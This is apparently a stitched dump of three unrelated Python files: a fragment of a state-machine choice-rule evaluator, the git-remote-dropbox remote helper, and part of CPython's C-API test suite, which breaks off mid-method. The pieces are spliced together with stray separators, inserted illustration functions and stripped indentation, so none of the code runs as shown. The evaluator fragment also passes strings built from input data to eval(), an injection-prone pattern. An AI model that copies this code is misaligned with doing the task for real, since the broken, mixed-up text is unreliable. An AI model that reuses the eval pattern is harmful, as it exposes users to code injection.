#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
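
# ---------------------------------------------------------------------------
# Hedged illustration (not part of the original module): a minimal standalone
# sketch of how a single AWS Choice rule is flattened into a Python comparison
# string and evaluated, mirroring the evaluate()/evaluateNextState() flow
# above. The rule, operator table and state data below are made-up sample
# values; the real class keeps its own operators/operators_python lists and
# resolves variables with jsonpath.
def _demo_choice_rule_eval():
    rule = {"Variable": "$.iterator.continue", "NumericLessThan": 10}
    operators = {"NumericLessThan": "<", "StringEquals": "=="}
    state = {"iterator": {"continue": 5}}
    variable = rule["Variable"].split("$.")[1]      # "iterator.continue"
    op = next(k for k in rule if k in operators)    # "NumericLessThan"
    expression = "%s %s %s" % (variable, operators[op], rule[op])
    value = state["iterator"]["continue"]           # resolve the path by hand
    return eval(expression.replace(variable, str(value)))  # True, since 5 < 10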
|
__init__.py
|
#!/usr/bin/env python
# Copyright (c) 2015-2017 Anish Athalye (me@anishathalye.com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import dropbox
import json
import multiprocessing
import multiprocessing.dummy
import multiprocessing.pool
import os
import posixpath
import subprocess
import sys
import zlib
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
__version__ = '1.0.3'
CONFIG_FILE = '~/.git-remote-dropbox.json'
DEVNULL = open(os.devnull, 'w')
PROCESSES = 20
MAX_RETRIES = 3
def stdout(line):
"""
Write line to standard output.
"""
sys.stdout.write(line)
sys.stdout.flush()
def stderr(line):
"""
Write line to standard error.
"""
sys.stderr.write(line)
sys.stderr.flush()
def readline():
"""
Read a line from standard input.
"""
return sys.stdin.readline().strip() # remove trailing newline
def stdout_to_binary():
"""
Ensure that stdout is in binary mode on windows
"""
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
def git_command_output(*args, **kwargs):
"""
Return the result of running a git command.
"""
args = ('git',) + args
output = subprocess.check_output(args, stderr=DEVNULL)
if kwargs.get('decode', True):
output = output.decode('utf8')
if kwargs.get('strip', True):
output = output.strip()
return output
def git_command_ok(*args):
"""
Return whether a git command runs successfully.
"""
args = ('git',) + args
return subprocess.call(args, stdout=DEVNULL, stderr=DEVNULL) == 0
def git_is_ancestor(ancestor, ref):
"""
Return whether ancestor is an ancestor of ref.
This returns true when it is possible to fast-forward from ancestor to ref.
"""
return git_command_ok('merge-base', '--is-ancestor', ancestor, ref)
def git_object_exists(sha):
"""
Return whether the object exists in the repository.
"""
return git_command_ok('cat-file', '-t', sha)
def git_history_exists(sha):
"""
Return whether the object, along with its history, exists in the
repository.
"""
return git_command_ok('rev-list', '--objects', sha)
def git_ref_value(ref):
"""
Return the hash of the ref.
"""
return git_command_output('rev-parse', ref)
def git_object_kind(sha):
"""
Return the type of the object.
"""
return git_command_output('cat-file', '-t', sha)
def git_object_data(sha, kind=None):
"""
Return the contents of the object.
If kind is None, return a pretty-printed representation of the object.
"""
if kind is not None:
return git_command_output('cat-file', kind, sha, decode=False, strip=False)
else:
return git_command_output('cat-file', '-p', sha, decode=False, strip=False)
def git_encode_object(sha):
"""
Return the encoded contents of the object.
The encoding is identical to the encoding git uses for loose objects.
This operation is the inverse of `git_decode_object`.
"""
kind = git_object_kind(sha)
size = git_command_output('cat-file', '-s', sha)
contents = git_object_data(sha, kind)
data = kind.encode('utf8') + b' ' + size.encode('utf8') + b'\0' + contents
compressed = zlib.compress(data)
return compressed
def git_decode_object(data):
"""
Decode the object, write it, and return the computed hash.
This operation is the inverse of `git_encode_object`.
"""
decompressed = zlib.decompress(data)
header, contents = decompressed.split(b'\0', 1)
kind = header.split()[0]
p = subprocess.Popen(['git', 'hash-object', '-w', '--stdin', '-t', kind.decode('utf8')],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=DEVNULL)
sha = p.communicate(contents)[0].decode('utf8').strip()
return sha
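
# Hedged illustration (not part of the original module): a minimal sketch of
# the loose-object byte layout that git_encode_object()/git_decode_object()
# round-trip above -- "<kind> <size>\0<contents>", zlib-compressed. It avoids
# calling git entirely; the object kind and contents are made-up sample data.
def _demo_loose_object_roundtrip():
    kind, contents = b'blob', b'hello world\n'
    data = kind + b' ' + str(len(contents)).encode('utf8') + b'\0' + contents
    compressed = zlib.compress(data)
    header, body = zlib.decompress(compressed).split(b'\0', 1)
    assert header == b'blob 12' and body == contents
    return compressed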
def git_list_objects(ref, exclude):
"""
Return the objects reachable from ref excluding the objects reachable from
exclude.
"""
exclude = ['^%s' % obj for obj in exclude if git_object_exists(obj)]
objects = git_command_output('rev-list', '--objects', ref, *exclude)
if not objects:
return []
return [i.split()[0] for i in objects.split('\n')]
def git_referenced_objects(sha):
"""
Return the objects directly referenced by the object.
"""
kind = git_object_kind(sha)
if kind == 'blob':
# blob objects do not reference any other objects
return []
data = git_object_data(sha).decode('utf8').strip()
if kind == 'tag':
# tag objects reference a single object
obj = data.split('\n')[0].split()[1]
return [obj]
elif kind == 'commit':
# commit objects reference a tree and zero or more parents
lines = data.split('\n')
tree = lines[0].split()[1]
objs = [tree]
for line in lines[1:]:
if line.startswith('parent '):
objs.append(line.split()[1])
else:
break
return objs
elif kind == 'tree':
# tree objects reference zero or more trees and blobs, or submodules
lines = data.split('\n')
# submodules have the mode '160000' and the kind 'commit', we filter them out because
# there is nothing to download and this causes errors
return [line.split()[2] for line in lines if not line.startswith('160000 commit ')]
else:
raise Exception('unexpected git object type: %s' % kind)
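
# Hedged illustration (not part of the original module): a small sketch of how
# the 'commit' branch of git_referenced_objects() above pulls the tree and
# parent hashes out of a pretty-printed commit. The commit text below is
# fabricated sample data, not output captured from a real repository.
def _demo_parse_commit_references():
    data = ('tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n'
            'parent 1111111111111111111111111111111111111111\n'
            'parent 2222222222222222222222222222222222222222\n'
            'author A U Thor <author@example.com> 1234567890 +0000\n'
            '\n'
            'commit message\n')
    lines = data.split('\n')
    objs = [lines[0].split()[1]]                 # the tree
    for line in lines[1:]:
        if line.startswith('parent '):
            objs.append(line.split()[1])         # zero or more parents
        else:
            break
    return objs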
class Level(object):
"""
A class for severity levels.
"""
ERROR = 0
INFO = 1
DEBUG = 2
class Poison(object):
"""
A poison pill.
Instances of this class can be used as sentinel objects to communicate
termination requests to processes.
"""
def __init__(self, message=None):
self.message = message
class Binder(object):
"""
A class to bind a method to an object.
Python's built-in pickling does not work on bound methods or lambdas. This
class is designed to work around that restriction. In addition, it provides
the ability to partially apply a function.
For example, Binder can be used as follows:
>>> class A(object):
... def __init__(self, x):
... self.x = x
... def add(self, y, z):
... return self.x + y + z
...
>>> b = Binder(A(1), 'add', 2)
>>> b(3)
6
In the above example, it is possible to pickle the `b` object.
"""
def __init__(self, obj, func_name, *args):
"""
Initialize a Binder with an object and a function by its name.
Partially apply the function with args.
"""
self._obj = obj
self._func_name = func_name
self._args = args
def __call__(self, *args):
"""
Call the function bound to the object, passing args if given.
"""
# we cannot pickle an instance method, but we can pickle the instance
# itself along with the method name, and then we can dynamically
# retrieve the unbound method and call it with the instance and
# arguments
method = getattr(type(self._obj), self._func_name)
args = self._args + args
return method(self._obj, *args)
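
# Hedged illustration (not part of the original module): Binder exists so that
# a partially applied method can be handed to process/thread pools where plain
# bound methods may not pickle. A tiny round-trip sketch using a builtin str
# method as the bound target (a placeholder, not how the helper uses it):
def _demo_binder_pickle_roundtrip():
    import pickle
    b = Binder('hello', 'upper')             # partially apply str.upper to 'hello'
    restored = pickle.loads(pickle.dumps(b))
    return restored()                        # 'HELLO'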
class Helper(object):
"""
A git remote helper to communicate with Dropbox.
"""
def __init__(self, token, path, processes=PROCESSES):
self._token = token
self._path = path
self._processes = processes
self._verbosity = Level.INFO # default verbosity
self._refs = {} # map from remote ref name => (rev number, sha)
self._pushed = {} # map from remote ref name => sha
@property
def verbosity(self):
return self._verbosity
def _write(self, message=None):
"""
Write a message to standard output.
"""
if message is not None:
stdout('%s\n' % message)
else:
stdout('\n')
def _trace(self, message, level=Level.DEBUG, exact=False):
"""
Log a message with a given severity level.
"""
if level > self._verbosity:
return
if exact:
if level == self._verbosity:
stderr(message)
return
if level <= Level.ERROR:
stderr('error: %s\n' % message)
elif level == Level.INFO:
stderr('info: %s\n' % message)
elif level >= Level.DEBUG:
stderr('debug: %s\n' % message)
def _fatal(self, message):
"""
Log a fatal error and exit.
"""
self._trace(message, Level.ERROR)
exit(1)
def _connection(self):
"""
Return a Dropbox connection object.
"""
# we use fresh connection objects for every use so that multiple
# threads can have connections simultaneously
return dropbox.Dropbox(self._token)
def run(self):
"""
Run the helper following the git remote helper communication protocol.
"""
while True:
line = readline()
if line == 'capabilities':
self._write('option')
self._write('push')
self._write('fetch')
self._write()
elif line.startswith('option'):
self._do_option(line)
elif line.startswith('list'):
self._do_list(line)
elif line.startswith('push'):
self._do_push(line)
elif line.startswith('fetch'):
self._do_fetch(line)
elif line == '':
break
else:
self._fatal('unsupported operation: %s' % line)
def _do_option(self, line):
"""
Handle the option command.
"""
if line.startswith('option verbosity'):
self._verbosity = int(line[len('option verbosity '):])
self._write('ok')
else:
self._write('unsupported')
def _do_list(self, line):
"""
Handle the list command.
"""
for_push = 'for-push' in line
refs = self._get_refs(for_push=for_push)
for ref in refs:
self._write(ref)
self._write()
def _do_push(self, line):
"""
Handle the push command.
"""
while True:
src, dst = line.split(' ')[1].split(':')
if src == '':
self._delete(dst)
else:
self._push(src, dst)
line = readline()
if line == '':
break
self._write()
def _do_fetch(self, line):
"""
Handle the fetch command.
"""
while True:
_, sha, value = line.split(' ')
self._fetch(sha)
line = readline()
if line == '':
break
self._write()
def _delete(self, ref):
"""
Delete the ref from the remote.
"""
self._trace('deleting ref %s' % ref)
try:
self._connection().files_delete(self._ref_path(ref))
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.DeleteError):
raise
# someone else might have deleted it first, that's fine
self._refs.pop(ref, None) # discard
self._pushed.pop(ref, None) # discard
self._write('ok %s' % ref)
def _push(self, src, dst):
"""
Push src to dst on the remote.
"""
force = False
if src.startswith('+'):
src = src[1:]
force = True
present = [self._refs[name][1] for name in self._refs]
present.extend(self._pushed.values())
# before updating the ref, write all objects that are referenced
objects = git_list_objects(src, present)
try:
# upload objects in parallel
pool = multiprocessing.pool.ThreadPool(processes=self._processes)
res = pool.imap_unordered(Binder(self, '_put_object'), objects)
# show progress
total = len(objects)
self._trace('', level=Level.INFO, exact=True)
for done, _ in enumerate(res, 1):
pct = float(done) / total
message = '\rWriting objects: {:4.0%} ({}/{})'.format(pct, done, total)
if done == total:
message = '%s, done.\n' % message
self._trace(message, level=Level.INFO, exact=True)
except Exception:
if self.verbosity >= Level.DEBUG:
raise # re-raise exception so it prints out a stack trace
else:
self._fatal('exception while writing objects (run with -v for details)\n')
sha = git_ref_value(src)
error = self._write_ref(sha, dst, force)
if error is None:
self._write('ok %s' % dst)
self._pushed[dst] = sha
else:
self._write('error %s %s' % (dst, error))
def _ref_path(self, name):
"""
Return the path to the given ref on the remote.
"""
assert name.startswith('refs/')
return posixpath.join(self._path, name)
def _ref_name_from_path(self, path):
"""
Return the ref name given the full path of the remote ref.
"""
prefix = '%s/' % self._path
assert path.startswith(prefix)
return path[len(prefix):]
def _object_path(self, name):
"""
Return the path to the given object on the remote.
"""
prefix = name[:2]
suffix = name[2:]
return posixpath.join(self._path, 'objects', prefix, suffix)
def _get_file(self, path):
"""
Return the revision number and content of a given file on the remote.
Return a tuple (revision, content).
"""
self._trace('fetching: %s' % path)
meta, resp = self._connection().files_download(path)
return (meta.rev, resp.content)
def _put_object(self, sha):
"""
Upload an object to the remote.
"""
data = git_encode_object(sha)
path = self._object_path(sha)
self._trace('writing: %s' % path)
retries = 0
while True:
try:
mode = dropbox.files.WriteMode('overwrite')
self._connection().files_upload(data, path, mode, mute=True)
except dropbox.exceptions.InternalServerError:
self._trace('internal server error writing %s, retrying' % sha)
if retries < MAX_RETRIES:
retries += 1
else:
raise
else:
break
def _download(self, input_queue, output_queue):
"""
Download files given in input_queue and push results to output_queue.
"""
while True:
try:
obj = input_queue.get()
if isinstance(obj, Poison):
return
_, data = self._get_file(self._object_path(obj))
computed_sha = git_decode_object(data)
if computed_sha != obj:
output_queue.put(
Poison('hash mismatch %s != %s' % (computed_sha, obj)))
output_queue.put(obj)
except Exception as e:
output_queue.put(Poison('exception while downloading: %s' % e))
def _fetch(self, sha):
"""
Recursively fetch the given object and the objects it references.
"""
# have multiple threads downloading in parallel
queue = [sha]
pending = set()
downloaded = set()
input_queue = multiprocessing.Queue() # requesting downloads
output_queue = multiprocessing.Queue() # completed downloads
procs = []
for _ in range(self._processes):
target = Binder(self, '_download')
args = (input_queue, output_queue)
# use multiprocessing.dummy to use threads instead of processes
proc = multiprocessing.dummy.Process(target=target, args=args)
proc.daemon = True
proc.start()
procs.append(proc)
self._trace('', level=Level.INFO, exact=True) # for showing progress
done = total = 0
while queue or pending:
if queue:
# if possible, queue up download
sha = queue.pop()
if sha in downloaded or sha in pending:
continue
if git_object_exists(sha):
if not git_history_exists(sha):
# this can only happen in the case of aborted fetches
# that are resumed later
self._trace('missing part of history from %s' % sha)
queue.extend(git_referenced_objects(sha))
else:
self._trace('%s already downloaded' % sha)
else:
pending.add(sha)
input_queue.put(sha)
else:
# process completed download
res = output_queue.get()
if isinstance(res, Poison):
self._fatal(res.message)
pending.remove(res)
downloaded.add(res)
queue.extend(git_referenced_objects(res))
# show progress
done = len(downloaded)
total = done + len(pending)
pct = float(done) / total
message = '\rReceiving objects: {:4.0%} ({}/{})'.format(pct, done, total)
self._trace(message, level=Level.INFO, exact=True)
self._trace('\rReceiving objects: 100% ({}/{}), done.\n'.format(done, total),
level=Level.INFO, exact=True)
for proc in procs:
input_queue.put(Poison())
for proc in procs:
proc.join()
def _write_ref(self, new_sha, dst, force=False):
"""
Atomically update the given reference to point to the given object.
Return None if there is no error, otherwise return a description of the
error.
"""
path = self._ref_path(dst)
if force:
# overwrite regardless of what is there before
mode = dropbox.files.WriteMode('overwrite')
else:
info = self._refs.get(dst, None)
if info:
rev, sha = info
if not git_object_exists(sha):
return 'fetch first'
is_fast_forward = git_is_ancestor(sha, new_sha)
if not is_fast_forward and not force:
return 'non-fast forward'
# perform an atomic compare-and-swap
mode = dropbox.files.WriteMode.update(rev)
else:
# perform an atomic add, which fails if a concurrent writer
# writes before this does
mode = dropbox.files.WriteMode('add')
self._trace('writing ref %s with mode %s' % (dst, mode))
data = ('%s\n' % new_sha).encode('utf8')
try:
self._connection().files_upload(data, path, mode, mute=True)
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.UploadError):
raise
return 'fetch first'
else:
return None
def _get_refs(self, for_push):
"""
Return the refs present on the remote.
"""
try:
loc = posixpath.join(self._path, 'refs')
res = self._connection().files_list_folder(loc, recursive=True)
files = res.entries
while res.has_more:
res = self._connection().files_list_folder_continue(res.cursor)
files.extend(res.entries)
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.ListFolderError):
raise
if not for_push:
# if we're pushing, it's okay if nothing exists beforehand,
# but it's good to notify the user just in case
self._trace('repository is empty', Level.INFO)
return []
refs = []
for ref_file in files:
if not isinstance(ref_file, dropbox.files.FileMetadata):
continue
path = ref_file.path_lower
name = self._ref_name_from_path(path)
rev, data = self._get_file(path)
sha = data.decode('utf8').strip()
self._refs[name] = (rev, sha)
refs.append('%s %s' % (sha, name))
return refs
class Config(object):
"""
A class to manage configuration data.
"""
def __init__(self, filename):
with open(filename) as f:
self._settings = json.load(f)
def __getitem__(self, key):
"""
Return the setting corresponding to key.
Raises KeyError if the config file is missing the key.
"""
return self._settings[key]
def main():
# configure system
stdout_to_binary()
url = sys.argv[2]
# urls are one of:
# dropbox:///path/to/repo
# dropbox://username@/path/to/repo
# dropbox://:token@/path/to/repo
url = urlparse(url)
if url.scheme != 'dropbox':
stderr('error: URL must start with the "dropbox://" scheme\n')
exit(1)
if url.netloc:
if not url.username and not url.password:
# user probably put in something like "dropbox://path/to/repo"
# missing the third "/"
stderr('error: URL with no username or token must start with "dropbox:///"\n')
exit(1)
if url.username and url.password:
# user supplied both username and token
stderr('error: URL must not specify both username and token\n')
exit(1)
path = url.path.lower() # dropbox is case insensitive, so we must canonicalize
if path.endswith('/'):
stderr('error: URL path must not have trailing slash\n')
exit(1)
config_files = [
os.path.join(os.environ.get('XDG_CONFIG_HOME',
os.path.expanduser('~/.config')),
'git',
'git-remote-dropbox.json'),
os.path.expanduser('~/.git-remote-dropbox.json'),
]
config = None
for config_file in config_files:
try:
config = Config(config_file)
except ValueError:
stderr('error: malformed config file: %s\n' % config_file)
exit(1)
except IOError:
continue
else:
break
if not config:
stderr('error: missing config file: %s\n' % config_files[0])
exit(1)
try:
if url.password:
token = url.password
elif not url.username:
token = config['default']
else:
token = config[url.username]
except KeyError:
token_name = url.username or 'default'
stderr('error: config file missing token for key "%s"\n' % token_name)
exit(1)
helper = Helper(token, path)
try:
helper.run()
except Exception:
if helper.verbosity >= Level.DEBUG:
raise # re-raise exception so it prints out a stack trace
else:
stderr('error: unexpected exception (run with -v for details)\n')
exit(1)
except KeyboardInterrupt:
# exit silently with an error code
exit(1)
if __name__ == '__main__':
main()
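
# Hedged illustration (not part of the original module): how urlparse splits
# the token-carrying remote URL form that main() accepts. The token and path
# below are placeholder values, not real credentials.
def _demo_url_forms():
    parsed = urlparse('dropbox://:sometoken@/path/to/repo')
    # username is empty, password carries the token, path keeps the repo path
    return (parsed.username, parsed.password, parsed.path.lower())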
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'During handling of the above exception, '
br'another exception occurred:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l has grown to n elements
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
